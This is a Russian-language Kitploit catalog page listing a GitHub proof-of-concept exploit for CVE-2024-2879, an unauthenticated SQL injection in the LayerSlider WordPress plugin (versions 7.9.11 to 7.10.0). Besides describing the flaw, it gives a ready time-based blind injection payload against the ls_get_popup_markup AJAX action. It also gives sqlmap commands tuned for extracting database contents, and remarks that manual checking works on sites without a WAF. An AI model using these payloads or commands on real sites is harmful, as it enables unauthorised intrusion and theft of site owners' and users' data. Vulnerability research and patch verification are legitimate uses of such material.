Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-2879 — Эксплойт proof-of-concept для CVE-2024-2879: не требующая аутентификации SQL-инъекция в плагине LayerSlider для WordPress (7.9.11-7.10.0). Включает скрипт сканера и руководство по эксплуатации с помощью SQLMap для извлечения информации из базы данных. | Kitploit
Инструменты/GitHubGitHub/herculeszxc/cve-2024-2879
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubherculeszxc/cve-2024-2879

CVE-2024-2879

Эксплойт proof-of-concept для CVE-2024-2879: не требующая аутентификации SQL-инъекция в плагине LayerSlider для WordPress (7.9.11-7.10.0). Включает скрипт сканера и руководство по эксплуатации с помощью SQLMap для извлечения информации из базы данных.

Репозиторий
22312 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-2879

Описание

LayerSlider 7.9.11 – 7.10.0 – неаутентифицированная SQL-инъекция

Плагин LayerSlider для WordPress уязвим к SQL-инъекции через действие ls_get_popup_markup в версиях 7.9.11 и 7.10.0 из-за недостаточного экранирования пользовательского параметра и отсутствия должной подготовки существующего SQL-запроса. Это позволяет неаутентифицированным злоумышленникам добавлять дополнительные SQL-запросы в уже существующие запросы, которые могут быть использованы для извлечения конфиденциальной информации из базы данных.

Использование сканера

  1. Установите зависимости: pip install -r requirements.txt
  2. python3 scan.py или <urllist.txt> image

Ручная проверка (если сайт не защищён WAF)

"http://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and (SELECT 6416 FROM (SELECT(SLEEP(5)))nEiK)-- vqlq" Задержка ответа 5 секунд image

Эксплуатация с помощью SQL Map

sqlmap "https:://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T или sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T

Скачать инструмент